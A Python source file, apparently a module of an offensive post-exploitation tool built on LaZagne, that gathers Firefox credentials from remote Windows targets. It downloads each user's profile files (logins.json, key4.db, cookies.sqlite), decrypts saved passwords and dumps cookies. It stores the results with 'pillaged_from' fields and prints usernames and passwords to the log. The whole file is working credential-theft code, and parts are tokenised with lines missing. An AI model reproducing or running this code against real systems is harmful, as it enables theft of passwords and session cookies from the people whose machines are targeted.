2021-09-27 09:20:43 +00:00
import ntpath
import sys
import sqlite3 , os , json , base64 , binascii
from lib . toolbox import bcolors
from lib . dpapi import *
from lazagne . softwares . browsers . mozilla import Mozilla , firefox_browsers
from lazagne . config import constant
def __init__ ( self , options , logger , user , fileops , db ) :
self . logindata_path = None
self . localstate_path = None
self . localstate_dpapi = None
self . cookie_path = None
self . options = options
self . logging = logger
self . myfileops = fileops
self . db = db
self . aeskey = None
self . masterkey = None
self . masterkey_guid = None
self . logins = { }
self . cookies = { }
self . user = user
self . lasagne_firefox_browsers = firefox_browsers
self . lasagne_Mozilla = None
def get_files ( self ) :
try :
#files_to_get = os.path.join(profile, 'signons.sqlite')) (profile, 'logins.json')key3.db , key4.db
#directory_to_get = ['']
for mybrowser in firefox_browsers :
blacklist = [ ' . ' , ' .. ' ]
browser_path = mybrowser [ 1 ] #PATH Style is (u'firefox', u'{APPDATA}\\Mozilla\\Firefox'),
browser_name = mybrowser [ 0 ]
APPDATA = f " Users \\ { self . user . username } \\ AppData \\ Roaming "
path = browser_path . format ( APPDATA = APPDATA )
self . logging . debug ( f " [ { self . options . target_ip } ] [+] Looking for Mozilla { browser_name } Profile Files in { path } " )
try :
# Downloading profile file
localfile = self . myfileops . get_file ( ntpath . join ( path , ' profiles.ini ' ) )
if localfile != None :
self . logging . debug ( f " [ { self . options . target_ip } ] [+] Found { bcolors . OKBLUE } { self . user . username } { bcolors . ENDC } Mozilla { browser_name } Profile files : { ntpath . join ( path , ' profiles.ini ' ) } " )
else :
except Exception as ex :
self . logging . debug ( f " [ { self . options . target_ip } ] { bcolors . WARNING } Exception Getting Files profiles.ini for Mozilla { browser_name } - browser doesn ' t exist { bcolors . ENDC } " )
self . logging . debug ( ex )
#Into profiles directories
tmp_pwd = ntpath . join ( path , ' Profiles ' )
my_directory = self . myfileops . do_ls ( tmp_pwd , wildcard = ' * ' , display = False )
for infos in my_directory :
longname , is_directory = infos
self . logging . debug ( " ls returned file %s " % longname )
if longname not in blacklist and is_directory : # and longname=='profiles.ini':
try :
self . logging . debug ( f " [ { self . options . target_ip } ] [+] Found { bcolors . OKBLUE } { self . user . username } { bcolors . ENDC } Mozilla Profile Directory : { longname } " )
# Downloading profile important files
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for file_to_dl in [ ' signons.sqlite ' , ' logins.json ' , ' key3.db ' , ' key4.db ' , ' cookies.sqlite ' , ' cookies.sqlite-wal ' , ' cookies.sqlite-shm ' ] :
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try :
localfile = self . myfileops . get_file ( ntpath . join ( ntpath . join ( tmp_pwd , longname ) , file_to_dl ) , allow_access_error = True )
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if file_to_dl == ' cookies.sqlite ' and localfile :
self . get_cookies ( localfile )
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except Exception as ex :
self . logging . debug ( f " [ { self . options . target_ip } ] { bcolors . WARNING } Exception Getting Files for Mozilla { bcolors . ENDC } " )
self . logging . debug ( ex )
except Exception as ex :
self . logging . debug ( f " [ { self . options . target_ip } ] { bcolors . WARNING } Exception Getting Files for Mozilla { bcolors . ENDC } " )
self . logging . debug ( ex )
except Exception as ex :
self . logging . debug ( f " [ { self . options . target_ip } ] { bcolors . WARNING } Exception FIREFOX get_files { bcolors . ENDC } " )
self . logging . debug ( ex )
return None
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def get_cookies ( self , localfile ) :
Get encrypted data ( user / password ) and host from the json or sqlite files
try :
conn = sqlite3 . connect ( localfile )
c = conn . cursor ( )
c . execute ( ' SELECT name,value,host,path,expiry,isSecure FROM moz_cookies; ' )
# Using sqlite3 database
for row in c :
name = row [ 0 ]
value = row [ 1 ]
host = row [ 2 ]
path = row [ 3 ]
expiry = row [ 4 ]
self . db . add_cookies ( credz_type = ' browser-firefox ' ,
credz_name = name ,
credz_value = value ,
credz_expires_utc = expiry ,
credz_target = host ,
credz_path = path ,
pillaged_from_computer_ip = self . options . target_ip ,
pillaged_from_username = self . user )
self . logging . info (
f " [ { self . options . target_ip } ] [+] { bcolors . OKGREEN } [Mozilla Cookie] { bcolors . ENDC } for { host } { bcolors . OKBLUE } [ { name } : { value } ] { bcolors . ENDC } expire time: { ( datetime . fromtimestamp ( expiry ) ) . strftime ( ' % b %d % Y % H: % M: % S ' ) } " )
return 1
except Exception as ex :
self . logging . debug ( f " [ { self . options . target_ip } ] Firefox Cookie decoding exception : { ex } " )
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def run ( self ) :
#Download needed files
self . get_files ( )
#Set new starting path
#Extract from Lazagne config
profile = {
' APPDATA ' : u ' {drive} : \\ Users \\ {user} \\ AppData \\ Roaming \\ ' ,
' USERPROFILE ' : u ' {drive} : \\ Users \\ {user} \\ ' ,
' HOMEDRIVE ' : u ' {drive} : ' ,
' HOMEPATH ' : u ' {drive} : \\ Users \\ {user} ' ,
' ALLUSERSPROFILE ' : u ' {drive} : \\ ProgramData ' ,
' COMPOSER_HOME ' : u ' {drive} : \\ Users \\ {user} \\ AppData \\ Roaming \\ Composer \\ ' ,
' LOCALAPPDATA ' : u ' {drive} : \\ Users \\ {user} \\ AppData \\ Local ' ,
APPDATA = profile [ ' APPDATA ' ] . replace ( ' {drive} : ' , ' {download_path} ' )
APPDATA = APPDATA . format ( download_path = self . myfileops . get_download_directory ( ) , user = self . user . username )
#Run Lasagne
for mybrowser in firefox_browsers :
try :
name = mybrowser [ 0 ]
path = mybrowser [ 1 ]
browserpath = path . format ( APPDATA = APPDATA ) . replace ( ' \\ ' , ' / ' )
myMozilla = Mozilla ( name , browserpath , logger = self . logging )
pwd_found = myMozilla . run ( )
if len ( pwd_found ) > 0 :
longname = name
self . user . files [ longname ] = { }
self . user . files [ longname ] [ ' type ' ] = ' MozillaLoginData '
self . user . files [ longname ] [ ' status ' ] = ' decrypted '
self . user . files [ longname ] [ ' path ' ] = browserpath
for finding in pwd_found :
self . logins [ finding [ ' URL ' ] ] = { }
self . logins [ finding [ ' URL ' ] ] [ ' username ' ] = finding [ ' Login ' ]
self . logins [ finding [ ' URL ' ] ] [ ' password ' ] = finding [ ' Password ' ]
self . db . add_credz ( credz_type = ' browser-firefox ' ,
credz_username = finding [ ' Login ' ] ,
credz_password = finding [ ' Password ' ] ,
credz_target = finding [ ' URL ' ] ,
credz_path = browserpath ,
pillaged_from_computer_ip = self . options . target_ip ,
pillaged_from_username = self . user . username )
self . logging . info (
f " [ { self . options . target_ip } ] [+] { bcolors . OKGREEN } [Firefox Password] { bcolors . ENDC } for { finding [ ' URL ' ] } [ { bcolors . OKBLUE } { self . logins [ finding [ ' URL ' ] ] [ ' username ' ] } : { self . logins [ finding [ ' URL ' ] ] [ ' password ' ] } { bcolors . ENDC } ] " )
self . user . files [ longname ] [ ' secret ' ] = self . logins
except Exception as ex :
self . logging . debug ( f " [ { self . options . target_ip } ] { bcolors . WARNING } Exception decrypting logindata for Mozilla { self . user . username } { bcolors . ENDC } " )
self . logging . debug ( ex )
return self . logins